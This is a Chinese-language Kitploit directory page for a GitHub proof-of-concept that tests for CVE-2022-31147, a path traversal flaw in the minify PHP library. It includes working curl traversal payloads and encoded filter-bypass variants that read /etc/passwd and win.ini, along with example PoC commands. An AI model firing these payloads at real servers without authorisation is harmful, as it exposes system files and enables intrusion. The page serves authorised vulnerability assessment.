Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Webapp_Pentast — CVE-2022-31147 is a path traversal flaw in matthiasmullie/minify. This guide helps security teams test for arbitrary file read on Linux and Windows using Python and curl. It covers automated payload generation, manual validation, and safe practices for vulnerability assessment. | Kitploit
工具/GitHubGitHub/amhar-hckr/webapp_pentast
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubamhar-hckr/webapp_pentast

Webapp_Pentast

CVE-2022-31147 is a path traversal flaw in matthiasmullie/minify. This guide helps security teams test for arbitrary file read on Linux and Windows using Python and curl. It covers automated payload generation, manual validation, and safe practices for vulnerability assessment.

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-31147 概念验证与手动测试指南

本指南提供了针对 CVE-2022-31147 的全面测试方法,这是一个影响广泛使用的 matthiasmullie/minify 库的严重路径遍历漏洞。该漏洞允许攻击者利用 minify 端点中不充分的输入清理,在 Linux 和 Windows 服务器上实现任意文件读取。本指南面向安全专业人员、渗透测试人员以及希望评估 Web 应用对该威胁暴露情况的研究人员。

本指南的核心是一个自动化的 Python 概念验证脚本,它系统性地生成并测试多种遍历载荷。这些载荷利用不同深度的目录遍历(../)、多种编码方案(如 URL 编码和双重编码)以及端点变体(包括伪扩展名和查询参数),来绕过常见的路由和过滤机制。通过运用这些技术,该脚本能够在即使存在基础 Web 应用防火墙或自定义路由逻辑的环境下,最大程度地检测到易受攻击的配置。

检测准确性进一步通过内置的启发式规则得到增强,这些规则会分析响应内容中的已知文件标记。对于 Linux 目标,脚本会搜索 /etc/passwd 或其他敏感文件的典型模式;对于 Windows 系统,它会在 win.ini 等文件中寻找指示性内容。这种方法确保了成功利用能被可靠地识别,最大程度减少了误报,并简化了验证过程。

除了自动化测试,本指南还概述了使用 curl 的手动验证技术,使实践者能够构建并发送自定义请求以进行针对性分析,或独立验证发现结果。全程强调安全与授权测试的建议,包括仅在已获得明确许可的系统上进行评估的重要性。

本指南旨在同时支持快速验证和深入分析,支持自定义文件目标和高级绕过策略。它可以集成到更广泛的漏洞评估工作流中,为修复和风险管理提供可操作的见解。通过遵循所述的方法,安全团队能够有效识别、验证并处理其环境中的 CVE-2022-31147 暴露,从而增强 Web 应用的整体安全态势。

自动化 Python PoC

Linux 目标示例

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --linux --file /etc/passwd

Windows 目标示例

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --windows --file C:\Windows\win.ini

更安全的测试(推荐)

在服务器上创建一个无害文件,然后尝试读取它:

root@kitploit:~
python3 cve-2022-31147_poc.py --base https://yourdomain.tld/cdn/minify --file /var/www/test.txt

使用 curl 进行手动测试

Linux 路径遍历

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../etc/passwd"

Windows 路径遍历

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../windows/win.ini"

绕过变体

root@kitploit:~
curl -i "https://yourdomain.tld/cdn/minify/%2e%2e/../%2e%2e/../../etc/passwd"
curl -i "https://yourdomain.tld/cdn/minify/../../../../../../etc/passwd.css"

注意事项

  • 将 https://yourdomain.tld/cdn/minify 替换为您的实际目标 URL。
  • 为了更安全的测试,请使用您控制的且已知存在于服务器上的文件。
  • 在任何系统上进行测试前,请务必获得授权。

参考

  • CVE-2022-31147
下载工具